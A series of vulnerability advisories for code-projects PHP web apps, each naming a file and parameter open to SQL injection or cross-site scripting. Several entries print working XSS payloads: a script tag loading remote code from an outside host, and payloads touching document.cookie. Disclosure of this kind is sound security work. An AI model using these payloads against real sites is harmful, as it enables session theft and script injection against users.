Hamdi Sevben

**Name of the Vulnerable Software and Affected Versions** code-projects College Notes Gallery version 2.0 **Description** A critical vulnerability has been found in the code-projects College Notes Gallery, affecting an unknown functionality of the file login.php. The manipulation of the `user` argument leads to SQL injection. The exploit has been disclosed to the public and may be used. **Recommendations** For code-projects College Notes Gallery version 2.0, consider disabling the login functionality or restricting access to the login.php file until a patch is available. As a temporary workaround, avoid using the `user` argument in the affected functionality to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** code-projects QR Code Generator version 1.0 **Description** A problem exists in the code-projects QR Code Generator due to inadequate protection of the web page structure. This issue can be exploited by a remote attacker to conduct a cross-site scripting attack. The vulnerability affects an unknown part of the file /download.php?file=author.png, where the manipulation of the `file` argument with a specific input can lead to cross-site scripting. The attack can be initiated remotely. **Recommendations** For code-projects QR Code Generator version 1.0, consider disabling access to the /download.php file until a patch is available. As a temporary workaround, restrict the input for the `file` argument in the /download.php?file=author.png endpoint to prevent cross-site scripting attacks. Avoid using the `file` argument in the affected API endpoint until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** code-projects Record Management System version 1.0 **Description** A problematic issue has been discovered, affecting an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument `officename` with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross-site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. **Recommendations** For code-projects Record Management System version 1.0, consider disabling the `officename` argument in the /main/offices.php file until a patch is available. Restrict access to the Offices Handler component to minimize the risk of exploitation. Avoid using the `officename` argument in the affected API endpoint until the issue is resolved.

**Name of the Vulnerable Software and Affected Versions** code-projects Record Management System version 1.0 **Description** A problematic issue was found in the Document Type Handler component, specifically in the /main/doctype.php file. The manipulation of the `docname` argument with malicious input, such as "><script src="https://js.rip/b23tmbxf49"></script>, leads to cross-site scripting. This issue can be exploited remotely. **Recommendations** For code-projects Record Management System version 1.0, consider disabling the Document Type Handler component or restricting access to the /main/doctype.php file until a patch is available. Avoid using the `docname` argument in the affected API endpoint until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** code-projects Client Details System version 1.0 **Description** A critical issue has been found in the component HTTP POST Request Handler, where the manipulation of the `uemail` argument leads to sql injection. The exploit has been disclosed to the public and may be used. **Recommendations** For code-projects Client Details System version 1.0, consider disabling the HTTP POST Request Handler or restricting access to it until a patch is available. Avoid using the `uemail` argument in the affected HTTP POST request handler to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** code-projects Client Details System version 1.0 **Description** A critical issue was found in the HTTP POST Request Handler component, affecting an unknown part of the file /admin. The manipulation of the `username` argument leads to SQL injection. The issue has been publicly disclosed and may be exploited. **Recommendations** For code-projects Client Details System version 1.0, consider disabling the HTTP POST Request Handler component or restricting access to the /admin file until a patch is available. As a temporary workaround, avoid using the `username` argument in the affected HTTP POST Request Handler until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this issue.

**Name of the Vulnerable Software and Affected Versions** code-projects Client Details System version 1.0 **Description** A vulnerability has been found in the code-projects Client Details System, affecting the file /admin/regester.php of the component HTTP POST Request Handler. The manipulation of the arguments `fname`, `lname`, `email`, and `contact` leads to SQL injection. **Recommendations** For code-projects Client Details System version 1.0, consider restricting access to the /admin/regester.php file until a patch is available. As a temporary workaround, avoid using the `fname`, `lname`, `email`, and `contact` arguments in the affected HTTP POST Request Handler to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** code-projects Client Details System version 1.0 **Description** A vulnerability was found in the code-projects Client Details System, affecting some unknown processing of the file `/admin/manage-users.php`. The manipulation of the `id` argument leads to SQL injection. **Recommendations** For code-projects Client Details System version 1.0, consider restricting access to the `/admin/manage-users.php` file until a patch is available. As a temporary workaround, avoid using the `id` argument in the affected file to minimize the risk of exploitation.

**Name of the Vulnerable Software and Affected Versions** code-projects Client Details System version 1.0 **Description** A vulnerability was found in the code-projects Client Details System, classified as problematic. It affects an unknown function of the file /admin/update-clients.php. The manipulation of the `uid` argument leads to SQL injection. **Recommendations** For code-projects Client Details System version 1.0, consider restricting access to the /admin/update-clients.php file until a patch is available. As a temporary workaround, avoid using the `uid` argument in the affected function to minimize the risk of exploitation.

**Name of the Vulnerable Software and Affected Versions** code-projects Client Details System version 1.0 **Description** A vulnerability was found in the code-projects Client Details System, affecting an unknown functionality of the file /admin/clientview.php. The manipulation of the `ID` argument leads to SQL injection. **Recommendations** For code-projects Client Details System version 1.0, consider restricting access to the /admin/clientview.php file until a patch is available. As a temporary workaround, avoid using the `ID` argument in the affected file to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** code-projects Client Details System version 1.0 **Description** A problematic issue exists in code-projects Client Details System version 1.0, affecting some unknown functionality within the `/admin/regester.php` file. Manipulation of the `fname`, `lname`, `email`, and `contact` arguments can lead to cross site scripting. This attack can be launched remotely, and the exploit has been publicly disclosed. **Recommendations** code-projects Client Details System version 1.0: At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** code-projects Automated Voting System version 1.0 **Description** A critical vulnerability has been found in the Automated Voting System. This issue affects the /admin/ file of the Admin Login component. The manipulation of the `username` argument leads to SQL injection. The exploit has been disclosed to the public and may be used. **Recommendations** For version 1.0, consider disabling the Admin Login component until a patch is available. Restrict access to the /admin/ file to minimize the risk of exploitation. Avoid using the `username` argument in the affected component until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** code-projects Automated Voting System version 1.0 **Description** A critical vulnerability was found in the Login component of the Automated Voting System. The manipulation of the `idno` argument leads to SQL injection. The exploit has been disclosed to the public and may be used. **Recommendations** For version 1.0, consider disabling the Login component until a patch is available to prevent SQL injection attacks. Restrict access to the Login functionality to minimize the risk of exploitation. Avoid using the `idno` argument in the affected component until the issue is resolved.

**Name of the Vulnerable Software and Affected Versions** code-projects Voting System version 1.0 **Description** A critical issue has been found in the Voting System, affecting the /admin/ file of the Admin Login component. The manipulation of the `username` argument leads to sql injection. The exploit has been disclosed to the public and may be used. **Recommendations** For version 1.0, consider disabling the Admin Login component until a patch is available. Restrict access to the /admin/ file to minimize the risk of exploitation. Avoid using the `username` argument in the affected component until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** code-projects Voting System version 1.0 **Description** A critical vulnerability was found in the Voting System. The issue affects an unknown function of the component Voters Login. The manipulation of the `voter` argument leads to SQL injection. The exploit has been disclosed to the public and may be used. **Recommendations** For code-projects Voting System version 1.0, as a temporary workaround, consider restricting access to the Voters Login component until a patch is available. Avoid using the `voter` argument in the affected function until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** code-projects Intern Membership Management System version 2.0 **Description** A critical issue was found in the User Registration component, specifically in the /user registration/ file. The manipulation of the `userName` argument leads to SQL injection. The exploit has been disclosed to the public and may be used. **Recommendations** For code-projects Intern Membership Management System version 2.0, consider disabling the User Registration component or restricting access to the /user registration/ file until a patch is available. Avoid using the `userName` argument in the affected functionality to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this issue.

**Name of the Vulnerable Software and Affected Versions** code-projects Intern Membership Management System version 2.0 **Description** A vulnerability was found in the code-projects Intern Membership Management System, affecting an unknown part of the file `/user registration/` of the component User Registration. The manipulation of the argument `userName`, `firstName`, `lastName`, or `userEmail` with the input "><ScRiPt>confirm(document.domain)</ScRiPt>h0la leads to cross site scripting. **Recommendations** For version 2.0, as a temporary workaround, consider restricting the input for `userName`, `firstName`, `lastName`, and `userEmail` arguments in the `/user registration/` component to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** code-projects E-Commerce Site version 1.0 **Description** A problematic issue was found in the code-projects E-Commerce Site, affecting an unknown function of the file search.php. The manipulation of the `keyword` argument with the input `<video/src=x onerror=alert(document.cookie)>` leads to cross-site scripting. This issue can be exploited remotely. **Recommendations** For code-projects E-Commerce Site version 1.0, consider disabling the `search.php` file or restricting access to it until a patch is available. Avoid using the `keyword` argument in the affected file to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this issue.

**Name of the Vulnerable Software and Affected Versions** code-projects Library Management System version 2.0 **Description** A critical issue was found in the code-projects Library Management System, affecting the file /admin/login.php. The manipulation of the `username` argument leads to SQL injection. This issue can be initiated remotely. **Recommendations** For code-projects Library Management System version 2.0, consider restricting access to the `/admin/login.php` file until a patch is available. As a temporary workaround, avoid using the `username` argument in the affected file to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this issue.

**Name of the Vulnerable Software and Affected Versions** code-projects Library Management System version 2.0 **Description** A critical issue has been found in the processing of the file login.php, where the manipulation of the `student` argument leads to SQL injection. This issue can be exploited remotely. **Recommendations** For code-projects Library Management System version 2.0, consider restricting access to the login.php file until a patch is available. As a temporary workaround, avoid using the `student` argument in the affected file to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this issue.